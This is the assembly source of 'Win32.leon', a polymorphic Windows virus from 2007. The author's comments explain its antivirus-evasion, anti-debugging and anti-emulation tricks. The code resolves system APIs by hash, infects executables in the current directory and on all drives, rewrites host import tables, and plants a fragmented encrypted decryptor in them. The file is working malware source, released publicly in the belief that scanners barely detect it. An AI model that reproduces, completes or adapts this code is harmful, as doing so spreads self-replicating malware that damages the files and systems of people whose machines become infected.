kaze / FAT
;FICHIER : main.asm ;NOM : Win32.leon ;DATE : 14/01/2007 ;VERSION : 1.0 ;AUTEUR : kaze <> ;SITE : ; I'm happy to introduce to you win32.leon, a nearly original poly virus. This virus is ; mainly focused on AV-detection evading, so don't expect ultral33t spreading. The main ; technique of this is virus is "decryption via APIS", i.e the decryptor is (with a ; probability of 4/5) 100% api based. Some random fake api calls are also used in the ; decryptor: those apis are called with random arguments, but won't disturb the virus's ; excecution: they just return an error code (except when being debugged where they ; sometimes throw exceptions). Random api calls are also used in the virus body in order ; to avoid dynamic detection. ; A lot of little tricks are also used to fool emulators and scanners (like encryption ; through relocations, or decryptor fragementation) and are explained in the article ; stored at (french only for now). ;===== WIN32.LEON ========================================================================= ; OS: Win2000 and WinXP. Successfully tested on both. Won't work on vista because ; of the fake apis thingie. ; TYPE: PE Appender. ; TARGETS: Kaze*.exe PE files, with .code > ~10k and ; vsize(lastsection)<rawsize(lastsection) ; INFECTION: Insert virus body into last section. The decryptor is cut into X part, where ; X=number of api calls in the decryptor. Those parts are written in the .code ; section at random locations. The first part is located on the EP. If the ; decryptor used is api-based, the IAT of the host will also be modified by the ; virus. If encryption via relocs is used, relocations are modified and the ; host is relocated by the virus. ; SPREADING: Infect current directory and all physical drives. Avoid infection of ; SFC protected files. ; POLY/META: Polymorphic, using a kpasm-generated poly engine (rules in regles.kpasm). ; Use two decryptors (one at a time): a cryptoapis-based one and a simple ; xor loop. ; ANTIDBG: Yes. The decryptor and the virus body use a lot of "fake apis", i.e some ; apis with random arguments, that's won't do anything normally, but will ; throw some exception when debugged. ; ANTIEMUL: Yes. The decryptor is mainly composed of api calls. Most of the emulators ; don't emulate them all. Bogus api calls are also used (fake apis) in order ; to fool the emulator. The control flow in the decryptor is also a bit ; obfuscated: in order to jump from the K part to the K+1 part ; (in the decryptor), the emulator has to know the exact number of arguments ; of the api used in the K part. Up to 500 different fake apis could be used. ; ANTISCAN: Yes. Besides the poly, the virus sometimes uses encryption via ; relocations: the decryptor itself is encrypted by having some relocations ; pointing to the decryptor's code. The imagebase is modified to force windows ; to relocate the infected host (and so decrypt the decryptor). Relocations ; of the host are nulled and the host itsef is relocated by the virus. ; ANTIDYNAMIC: Yes. The sequence of the apis used by the virus body and the decryptor is ; random. Each virus api call is surrounded by up to 10 random fake apis calls. ; ANTIHEURIST: No. It may fool some but no original trick used. ; BUGS: Will crash every ~50 infections (don't ask me why). When crashing, the virus ; try to restore control to infected program through SEH. ;========================================================================================== ; Well, this virus has been finished in hurry, so some things could be improved. The poly ; engine for example is good, but could be easily improved. The payload also is a simple ; MessageBox: I coded a nice one (some animated monkey playing around with desktop's icons :), ; but hadn't time to integrate it into the virus. Just look at the web site for the payload, ; it's quite fun :D. I sent it to AVers three weeks ago, and only 3 detect it, but with a bad ; ratio (<70%). I think that's because they just don't care, it's a PoC after all. Well, ; i'll publish it anyway. ; Thankz to: ; - Baboon for the help with kpasm debugging ; - Poco for hosting this file ; - Squallsurf for the Vista VM ; - Silma for the motivation. ; - Tuna for the reading & correction of the paper ; ;And Greetz to all #fat,#nas and #uct members .386p .model flat,STDCALL ;===================================== MACROS ================================= call_ macro x mov [ebp+sauve_reg_anti_call],edx mov [ebp+sauve_reg_anti_call2],ebx mov edx,[ebp+x] call anti_call mov edx,[ebp+sauve_reg_anti_call] mov ebx,[ebp+sauve_reg_anti_call2] endm call_s macro x call [ebp+x] endm debug macro x pusha mov eax,x call printdec popa endm debuga macro x pusha push 0 push x push x push 0 call_ MessageBox popa endm ;======================================= EQUS ================================= TAILLE_IMPORTS EQU 8092 ;devrait suffire pour la plupart des hôtes (env 50 dlls) ;doit etre alignee sur 4k! TAILLE_API EQU 64 NB_DLLS_IMPORTEES EQU 1 FIRST_GEN_IMAGE_BASE EQU 400000h DECRYPTOR_SIZE EQU 4096*4 ;decrypteur polymorphisé MUTATED_DECRYPTOR_SIZE EQU 4096 ;pseudo-code modifié VIRTUAL_SIZE_VIRUS EQU (((virus_len+heap_len + TAILLE_IMPORTS)/4096)+1)*4096+DECRYPTOR_SIZE MAX_NB_PARTIES EQU 16 ;nombre max de parties pour le décrypteur PARTIE_MAX_SIZE EQU DECRYPTOR_SIZE/MAX_NB_PARTIES MAX_OPCODE_PAR_PARTIE EQU 20 ;sic OPCODE_MAX_SIZE EQU PARTIE_MAX_SIZE/MAX_OPCODE_PAR_PARTIE NB_CASES_MEMOIRE EQU 100 ;nombre de cases mémoires à réserver pour le poly PROV_RSA_FULL EQU 1 CRYPT_NEWKEYSET EQU 8 CRYPT_VERIFYCONTEXT EQU 0F0000000h CALG_RC4 EQU 06801h CALG_MD5 EQU 08003h TAILLE_CLE EQU 800000h PAGE_EXECUTE_READWRITE EQU 040h SECTION_MASK EQU 0C0000040h ;0F0000060h SLEEPTIME_ON_INFECT_DIR EQU 1000 MAX_ENDROITS_INTERDIT EQU 512 MAX_RETRY EQU 50 ;nombre max d'essais pour trouver des trous dans l'hote ;!! MAX_APIS_IMPORTEES*TAILLE_API*2 < TAILLE_IMPORTS/2 MAX_APIS_IMPORTEES EQU MAX_REAL_APIS_IMPORTEES + MAX_FAKE_APIS_IMPORTEES +8 MAX_REAL_APIS_IMPORTEES EQU 5 MAX_FAKE_APIS_IMPORTEES EQU 20 SIGNATURE_VIRUS EQU 54 PROB_DECRYPTEUR_SIMPLE EQU 5 PROBA_ENCRYPTION_RELOCS EQU 5 NB_RELOCS_PAR_ILOT EQU 80 ;multiple de 32bits ! IMAGEBASE_DEFAUT EQU 10000h ;==================================== FIRST GEN DATA ========================== extrn ExitProcess:PROC extrn MessageBoxA:PROC .data Signature db "Win32.Leon coded by kaze",0 ;======================================= CODE ================================= .code start: debut_virus: ;======================================= CORPS ================================ encrypt_cryptoapised_stuff: call delta delta: pop ebp sub ebp,offset delta ; sauvegarde quelques variables lea esi,[ebp+a_sauvegarder] lea edi,[ebp+sauvegarde] mov ecx,taille_sauvegarde rep movsb ;reequilibrage de la pile mov eax,[ebp+nb_fake_pushs] shl eax,2 add esp,eax ; cherche l'adresse de kernel32 find_kernel: mov edx,[esp] mov ecx,100h xor eax,eax and dx,word ptr 0F000h call seh seh_handler: mov esp,[esp+8] mov ebx,[esp+4] mov fs:[eax],ebx jmp find_it seh: push dword ptr fs:[eax] mov fs:[eax],esp find_it: sub edx,1000h dec ecx jz k32_not_found cmp word ptr [edx],'ZM' jnz find_it mov ebx,[edx+03ch] add ebx,edx cmp word ptr [ebx],'EP' jnz find_it pop dword ptr fs:[eax] pop eax ;récupère les apis de k32 lea esi,[ebp+liste_apis_k32] ;apis de k32 lea edi,[ebp+apis_k32] call find_apis ;met en place le seh call seh_virus seh_handler_virus: mov esp,[esp+8] mov ebx,[esp+4] mov fs:[eax],ebx call delta3 delta3: pop ebp sub ebp, offset delta3 jmp retour_hote seh_virus: xor eax,eax push dword ptr fs:[eax] mov fs:[eax],esp ;alloue la memoire lea esi,[ebp+a_allouer] lea edi,[ebp+variables_allouees] mov ecx,nb_a_allouer l_alloue: push esi edi ecx lodsd push eax push dword ptr 0 call_s LocalAlloc pop ecx edi esi test eax,eax jz retour_hote stosd loop l_alloue ;obligatoire pour les fake apis dynamiques call anti_call_init ;recupere l'adresse des autres apis lea eax,[ebp+name_user32] ;apis de user32 push eax call_ LoadLibrary mov edx,eax lea esi,[ebp+liste_apis_u32] lea edi,[ebp+apis_u32] call find_apis lea eax,[ebp+name_a32] ;apis de advapi32 push eax call_ LoadLibrary mov edx,eax lea esi,[ebp+liste_apis_a32] lea edi,[ebp+apis_a32] call find_apis and [ebp+calc_chksum],dword ptr 0 ;CheckSumMappedFile (optionnel) lea eax,[ebp+name_imagehlp] push eax call_ LoadLibrary test eax,eax jz no_image_help lea ebx,[ebp+imagehlp_api] push ebx push eax call_ GetProcAddress mov [ebp+calc_chksum],eax no_image_help: and [ebp+sfc_protected],dword ptr 0 ;SfcIsfileProtected (optionnel) lea eax,[ebp+name_sfc] push eax call_ LoadLibrary test eax,eax jz no_sfc lea ebx,[ebp+sfc_api] push ebx push eax call_ GetProcAddress mov [ebp+sfc_protected],eax no_sfc: ;================================ LANCEMENT DES THREADS ======================= call [ebp+GetTickCount] mov [ebp+poly_rand_seed],eax mov [ebp+RAND_SEED],eax ;infecte le rep courant call infect_rep ;payload call payload ;================================= RETOUR A L'HOTE ============================ retour_hote: test ebp,ebp jz retour_hote_prem_gen call restaure_hote retour_hote_prem_gen: ;lance la thread qui ifnecte tous les disques lea esi,[ebp+infecte_disques] call make_thread jmp [ebp+sauve_ancien_ep] k32_not_found: jmp k32_not_found ;======================================= FONCTIONS ============================ include include poly_assembleur.asm include polymorphisation.asm include fragmentation.asm include fusion_imports.asm include fake_apis.asm include payload.asm include relocation.asm include infection.asm ;INFECTE_PE in: eax--> PE mappé en memoire ; out : none infecte_pe proc near pusha mov edx,[eax+3Ch] add edx,eax ;edx-->PE Header mov ebx,eax ;ebx=file mapping offset ;reinit quelques trucs xor eax,eax mov edi,[ebp+adresses_interdites] stosd mov [ebp+offset locations],dword ptr eax ;cherche la dernière section mov [edx+0B0h],eax ;marque d'infection lea esi,[edx+18h] movzx ecx, word ptr [edx+14h] ;SizeOfOptionalHeader add esi,ecx ;esi-->sections movzx ecx,word ptr [edx+06h] cherche_derniere_sec: cmp [esi+12],eax jb ch2 mov eax,[esi+12] mov edi,esi ch2: add esi,28h loop cherche_derniere_sec mov ecx,[edi+8] ;ecx=VSize cmp ecx,[edi+16] ja infecte_pe_fin ;si vsize>rawsize infecte pas call encryption_relocs_init ;les modifs d'usage mov ecx,[edx+28h] ;entry point (rva) add ecx,[ebp+imagebase] ;entry point(va) mov [ebp+ancien_ep],ecx ;edi-->header derniere section (en ram) add eax,[edi+8] ;ajoute VSize (eax etait = a RVA section) mov [ebp+infection_rva],eax add eax,[ebp+imagebase] mov [ebp+virus_start_va],eax mov esi,[edi+20] ;RawAddress add esi,[edi+8] ;VirtualSize add esi,ebx ;adresse du filemapping mov [ebp+infection_raw],esi mov eax,[ebp+taille_virus_alignee] add [edi+8],dword ptr VIRTUAL_SIZE_VIRUS add [edi+16],eax ;RawSize or [edi+36],SECTION_MASK ;remplit la table des adresse interdites call evite_adresses ;choisit un décrypteur parmis les deux dispos call poly_choisit_decrypteur xor eax,eax cmp [ebp+poly_name_dll],eax jz detourne_pas_iat ;modifie l'iat pour importer les apis du decrypteur + les fake apis mov eax,[edx+80h] ;RVA de l'IAT call rva2raw mov esi,eax add esi,ebx ;esi=raw imports mov ecx,[edx+84h] ;ecx=size imports mov edi,[ebp+infection_raw] ;edi=raw addresse du virus (pas encore le code à ce niveau là, mais l'iat) call imports_init ;détourne l'iat mov eax,[ebp+poly_name_dll] call add_iid_decrypteur ;ajoute le iid lea esi,[ebp+iat_crypto_decrypteur] call deal_imports ;importe les apis + les fake apis du dll detourne_pas_iat: ;cherche les fake apis (des autres dll) importées par l'hote lea esi,[ebp+liste_fake_apis] lea edi,[ebp+fake_apis] call find_fake_apis mov [ebp+nb_fake_apis],eax ;pseudo-poly le decrypteur (ajoute des fake apis calls) movzx eax,byte ptr [ebp+poly_nb_parties_decrypteur] mov edi,[ebp+mutated_pseudo_decrypteur] mov esi,[ebp+poly_decrypteur] call poly_pseudo_polymorphize ;poly_nb_parties_decrypteur modifié ;trouve X plages d'adresse de MAX_PARTIE_SIZE octets que l'on peut overwriter push ebx mov ebx,PARTIE_MAX_SIZE movzx ecx,byte ptr [ebp+poly_nb_parties_decrypteur] call trouve_adresses ;trouve poly_nb_parties_decrypteur endroits de PARTIE_MAX_SIZE octets chacuns pop ebx test eax,eax jz infecte_pas call sauvegarde_hote ;assemble et ecrit le decrypteur aux endroit maintenant sauvegardes mov esi,[ebp+mutated_pseudo_decrypteur] call poly_polymorphise ;encryption via les relocs call encryption_relocs ;ecrit le code du virus mov edi,[ebp+infection_raw] add edi,TAILLE_IMPORTS + DECRYPTOR_SIZE ; edi = raw adresse du code du virus push edi lea esi,[ebp+debut_virus] mov ecx,virus_len rep movsb pop edi ;encrypte le code du virus call [ebp+fonction_encryption] infecte_pas: add [edx+50h],dword ptr VIRTUAL_SIZE_VIRUS mov ecx,[ebp+calc_chksum] jecxz infecte_pe_fin ;si CheckSumpMappedFile non present ... lea esi,[ebp+checksum] push esi lea eax,[esi+4] push eax push dword ptr [ebp+WFD_nFileSizeLow] push ebx call ecx ;eax--> PE_Header mappé en RAM mov ecx,[esi] mov [eax+58h],ecx ;enregistre la nouvelle checksum infecte_pe_fin: popa ret infecte_pe endp ;RVA2RAW : in : eax=rva ,edx-->pe_header ; out : eax=raw adress rva2raw proc near push esi push ebx push ecx lea esi,[edx+18h] movzx ecx,word ptr [edx+14h] ;SizeOfOptionalHeader add esi,ecx ;esi-->sections movzx ecx,word ptr [edx+06h] cherche_sec2: mov ebx,[esi+12] cmp ebx,eax ja ch4 add ebx,[esi+8] cmp [esi+8],dword ptr 0 jnz vsize_ok add ebx,[esi+16] ;raw size vsize_ok: cmp ebx,eax ja found2 ch4: add esi,28h loop cherche_sec2 found2: mov ebx,[esi+12] sub eax,ebx add eax,[esi+20] pop ecx pop ebx pop esi ret rva2raw endp ;SECTION_INFO : in : eax=rva ,edx-->pe_header ; out : eax--> section header section_info proc near push esi push ecx push ebx lea esi,[edx+18h] movzx ecx, word ptr [edx+14h] ;SizeOfOptionalHeader add esi,ecx ;esi-->sections movzx ecx,word ptr [edx+06h] cherche_sec: or [esi+36],SECTION_MASK mov ebx,[esi+12] cmp ebx,eax ja ch3 add ebx,[esi+8] cmp [esi+8],dword ptr 0 jnz vsize_ok2 add ebx,[esi+16] ; raw size vsize_ok2: cmp ebx,eax ja found ch3: add esi,28h loop cherche_sec found: mov eax,esi pop ebx pop ecx pop esi ret section_info endp ;CHECK_INFECTION : check si l'hote a déjà été visité ; in : edx--> PE header ; out : ecx!=0 si deja infecté check_and_set_infection proc near mov ecx,[edx+8] ;timestamp cmp ch,SIGNATURE_VIRUS jz deja_infecte mov ch,SIGNATURE_VIRUS mov [edx+8],ecx xor ecx,ecx deja_infecte: ret check_and_set_infection endp ;IS_SFC : check si sfc protected ;in : ebx->filename ;out: ecx!= si sfc protected is_sfc proc near push eax edx esi edi xor ecx,ecx push ecx lea eax,[ebp+Buffer] push eax push dword ptr 260 push ebx call_ GetFullPathName push dword ptr 260*2 lea eax,[ebp+Buffer2] push eax xor eax,eax dec eax push eax lea eax,[ebp+Buffer] push eax xor eax,eax push eax push eax call_ MultiByteToWideChar lea eax,[ebp+Buffer2] push eax xor eax,eax push eax call [ebp+sfc_protected] mov ecx,eax pop edi esi edx eax ret is_sfc endp ;INFECTION : in : ebx--> Filename, WFD rempli avec un .exe ; out : none infection proc near pusha push 80h ;ATTRIB_NORMAL push ebx call_ SetFileAttributes ;teste si SFC cmp [ebp+sfc_protected],dword ptr 0 jz pas_sfc_api call is_sfc test ecx,ecx jnz pasbon pas_sfc_api: xor eax,eax push eax push eax push 3 push eax inc eax push eax push 0C0000000h push ebx call_ CreateFile inc eax jz peuxpas dec eax mov [ebp+Fhandle],eax mov edi,[ebp+WFD_nFileSizeLow] call create_mapped_file test eax,eax jz mappas mov [ebp+Mhandle],eax call map_file ; eax=map_offset test eax,eax jz veuxpas mov esi,[eax+3Ch] cmp esi,edi jae pasbon ;si pas PE, evite les violation de pages add esi,eax cmp dword ptr [esi],'EP' jnz pasbon cmp dword ptr [esi+84h],TAILLE_IMPORTS/2+NB_DLLS_IMPORTEES*14h jae pasbon mov edx,esi call check_and_set_infection test ecx,ecx jnz pasbon mov ecx,[esi+34h] mov [ebp+imagebase],ecx mov esi,[esi+3Ch] ;File Alignement push eax call_ UMVOFile push [ebp+Mhandle] call_ CloseHandle xor edx,edx mov eax,virus_len+TAILLE_IMPORTS+DECRYPTOR_SIZE ;edi=fichier+virus div esi inc eax mul esi mov [ebp+taille_virus_alignee],eax add edi,eax call create_mapped_file mov [ebp+Mhandle],eax call map_file ; eax=map_offset call infecte_pe pasbon: push eax call_ UMVOFile veuxpas:push [ebp+Mhandle] call_ CloseHandle mappas: push [ebp+Fhandle] call_ CloseHandle peuxpas:push dword ptr [ebp+WFD_dwFileAttributes] push ebx call_ SetFileAttributes popa ret infection endp ;FIND_APIS: in: esi--> ckecksums(terminé par -1) edi--> apis[] edx=HMODULE* ; out: edi[] rempli find_apis proc near mov ebx,[edx+3ch] add ebx,edx ; ebx--> PE Header mov ecx,[ebx+78h] add ecx,edx ; ecx--> export table mov eax,[ecx+01ch] ; sauve les adresses des tables add eax,edx lea ebx,[ebp+lst_fnc] ; liste des adresses de fonctions mov [ebx],eax add ebx,4 mov eax,[ecx+24h] ; liste des ordinals add eax,edx mov [ebx],eax mov ebx,[ecx+20h] ; ebx-->liste des noms xor ecx,ecx add ebx,edx fa1: mov eax,[ebx+ecx*4] add eax,edx call calc_crc cmp eax,[esi] ; est-ce la fonction recherchée ? jz fa2 inc ecx jmp fa1 fa2: push esi mov esi,[ebp+lst_ord] ; choppe l'ordinal (marche en //) movzx eax,word ptr [esi+ecx*2] mov esi,[ebp+lst_fnc] ; et on s'en sert pour chopper l'adresse de l'api mov eax,[esi+eax*4] add eax,edx ; (RVA) stosd ; on la stock pop esi inc ecx add esi,4 ; api suivante inc dword ptr [esi] ; esi==0xFFFFFFF ? jz fa3 dec dword ptr[esi] jmp fa1 fa3: dec dword ptr[esi] ret find_apis endp ;CALC_CRC: in: eax--> apiname ; out: eax=crc calc_crc proc near push ecx push esi mov esi,eax xor eax,eax sub ecx,ecx cc1: lodsb test al,al jz cc2 add cl,al rol eax,cl add ecx,eax jmp cc1 cc2: mov eax,ecx pop esi pop ecx ret calc_crc endp ;INFECT_REP in : none ; out : none infect_rep proc near pusha lea esi,[ebp+WFD] lea eax,[ebp+mask] ;.exe test ebp,ebp jnz pas_premiere_gen lea eax,[ebp+mask_pg] ;kaze*.exe pas_premiere_gen: push esi push eax call_ FindFirstFile inc eax jz badrep dec eax mov [ebp+Shandle],eax unautreverre?: lea ebx,[ebp+WFD_szFileName] mov ecx,[ebp+sfc_protected] jecxz bypass_sfc ; TODO : sfc check bypass_sfc: call infection pas_touche: lea eax,[ebp+WFD] push eax push [ebp+Shandle] call_ FindNextFile test eax,eax ;dernier fichier ? jnz unautreverre? push [ebp+Shandle] call_ FindClose badrep: popa ret infect_rep endp ;MAP_FILE : in: edi=taille ; out: none map_file proc near xor eax,eax push edi push eax push eax push 00000002h push [ebp+Mhandle] call_ MVOFile ret map_file endp ;CREATE_MAPPED_FILE : in : edi=taille ; out : none create_mapped_file proc near xor eax,eax push eax push edi push eax push 00000004h push eax push [ebp+Fhandle] call_ CreateFileMapping ret create_mapped_file endp make_thread proc near ;esi--> debut de la thread pusha xor edx,edx lea eax,[ebp+vtmp1] push eax push edx lea eax,[ebp+vtmp2] push eax push esi push edx push edx call [ebp+CreateThread] popa ret make_thread endp fin_dyn_fake_apis: ;======================================= DATA ================================= a_allouer: dd DECRYPTOR_SIZE dd MUTATED_DECRYPTOR_SIZE dd MAX_ENDROITS_INTERDIT*2*4 dd XOR_LOOP_SIZE nb_a_allouer equ ($-offset a_allouer)/4 a_sauvegarder: ancien_ep dd offset first_gen imagebase dd FIRST_GEN_IMAGE_BASE a32_oft dd 0 a32_ft dd 0 locations dd MAX_NB_PARTIES*2+1 dup (0) infection_rva dd 0 poly_nb_parties_decrypteur db 0 fake_apis dd 2*NB_FAKE_APIS dup (?) nb_fake_apis dd ? taille_sauvegarde equ $ - a_sauvegarder RAND_SEED dd 45980131 signature db "win32.leon by kaze",0 disque db "B:\",0 dmask db "*",0 dotdot db "..",0 mask db "kaze*.exe",0 mask_pg db "kaze*.exe",0 name_user32 db 'user32.dll',0 name_imagehlp db 'imagehlp.dll',0 imagehlp_api db 'CheckSumMappedFile',0 name_sfc db 'sfc.dll',0 sfc_api db 'SfcIsFileProtected',0 name_a32 db 'ADVAPI32.DLL',0 msg db 'Infecté',0 nb_fake_pushs dd 0 ; pour reequilibrer la pile cle_anti_call db 35h liste_apis_k32: dd 0FDBE9DDFh ; CloseHandle dd 04B00FBA1h ; CreateFileA dd 00D6EA22Eh ; CreateFileMappingA dd 0BE307C51h ; CreateThread dd 04E5DE044h ; ExitThread dd 0BE7B8631h ; FindClose dd 0C915738Fh ; FindFirstFileA dd 08851F43Dh ; FindNextFileA dd 028F8C6FBh ; GetCurrentDirectoryA dd 09C3A5210h ; GetDriveTypeA dd 06B1C08DAh ; GetFullPathNameA dd 040BF2F84h ; GetProcAddress dd 08FAF830Bh ; GetTickCount dd 05D0915E3h ; GetWindowsDirectoryA dd 095765835h ; LoadLibraryA dd 01064BF83h ; LocalAlloc dd 032BEDDC3h ; MapViewOfFile dd 09588EE13h ; MultiByteToWideChar dd 08E0E5487h ; SetCurrentDirectoryA dd 050665047h ; SetFileAttributesA dd 03A00E23Bh ; Sleep dd 0FAE00D65h ; UnmapViewOfFile dd 0065F101Ah ; VirtualProtect dd 0FFFFFFFFh liste_apis_u32: dd 0C0059B5Fh ; MessageBoxA dd 0FFFFFFFFh liste_apis_a32: dd 0B4060931h ; CryptAcquireContextA dd 08320BDFEh ; CryptCreateHash dd 01437CBF2h ; CryptDecrypt dd 09BB3B145h ; CryptDeriveKey dd 0A6889767h ; CryptEncrypt dd 0C66A7A58h ; CryptHashData dd 0FFFFFFFFh code_to_crypt_len equ ($ - debut_virus) memoire: dd NB_CASES_MEMOIRE dup (0) virus_len equ ($ - debut_virus) ;======================================= BSS ================================== align dword ; KERNEL32.DLL apis_k32: CloseHandle dd ? CreateFile dd ? CreateFileMapping dd ? CreateThread dd ? ExitThread dd ? FindClose dd ? FindFirstFile dd ? FindNextFile dd ? GetCurrentDirectory dd ? GetDriveType dd ? GetFullPathName dd ? GetProcAddress dd ? GetTickCount dd ? GetWindowsDirectory dd ? LoadLibrary dd ? LocalAlloc dd ? MVOFile dd ? MultiByteToWideChar dd ? SetCurrentDirectory dd ? SetFileAttributes dd ? Sleep dd ? UMVOFile dd ? VProtect dd ? ; USER32.DLL apis_u32: MessageBox dd ? ; ADVAPI32.DLL apis_a32: CAcquireContextA dd ? CCreateHash dd ? CDecrypt dd ? CDeriveKey dd ? CEncrypt dd ? CHashData dd ? ;DIVERS lst_fnc dd ? lst_ord dd ? lst_noms dd ? Fhandle dd ? Mhandle dd ? Shandle dd ? WFD label byte WFD_dwFileAttributes dd ? WFD_ftCreationTime dd ? dd ? WFD_ftLastAccessTime dd ? dd ? WFD_ftLastWriteTime dd ? dd ? WFD_nFileSizeHigh dd ? WFD_nFileSizeLow dd ? WFD_dwReserved0 dd ? WFD_dwReserved1 dd ? WFD_szFileName db 260 dup (?) WFD_szAlternateFileName db 13 dup (?) db 03 dup (?) SavedDirectory db 260 dup (?) Buffer db 260 dup (?) Buffer2 db 260*2 dup (?) infection_raw dd ? virus_start_va dd ? iat_noms_apis_rva dd ? iat_noms_apis_raw dd ? taille_virus_alignee dd ? sfc_protected dd ? calc_chksum dd ? checksum dd ? old_checksum dd ? fonction_encryption dd ? poly_decrypteur dd ? poly_name_dll dd ? poly_liste_apis_compat dd ? poly_nb_apis_compat dd ? poly_buffer db 256 dup (?) simple_cle dd ? vtmp1 dd ? vtmp2 dd ? vtmp3 dd ? vtmp4 dd ? index_iat dd MAX_APIS_IMPORTEES dup (?) relocated_imagebase dd ? is_relocated db 0 ;=================== VARIABLES SAUVEGARDEES ================= sauvegarde: sauve_ancien_ep dd ? sauve_imagebase dd ? s_a32_oft dd ? s_a32_ft dd ? sauve_locations dd MAX_NB_PARTIES*2+1 dup (?) sauve_infection_rva dd ? sauve_nb_parties db ? ; FAKE APIS sauve_fake_apis dd 2*NB_FAKE_APIS dup (?) sauve_nb_fake_apis dd ? ; FUSION IMORTS ;=================== VARIABLES ALLOUEES ================= variables_allouees: decrypteur dd ? mutated_pseudo_decrypteur dd ? adresses_interdites dd ? xor_loop_location dd ? heap_len equ ($ - debut_virus) - virus_len ;================= PREMIERE GENERATION ================== first_gen: mov eax,virus_len call printdec call ExitProcess,0 printdec proc near ;c vite-fait ... pusha cld lea edi,buf mov ebx,10 xor ecx,ecx GUI_printdec_1: xor edx,edx div ebx push edx inc ecx test eax,eax jnz GUI_printdec_1 GUI_prindec_2: pop eax add eax,48 stosb loop GUI_prindec_2 xor eax,eax stosb push eax push offset Signature push offset buf push eax call MessageBoxA popa ret printdec endp buf db 20 dup (?) end start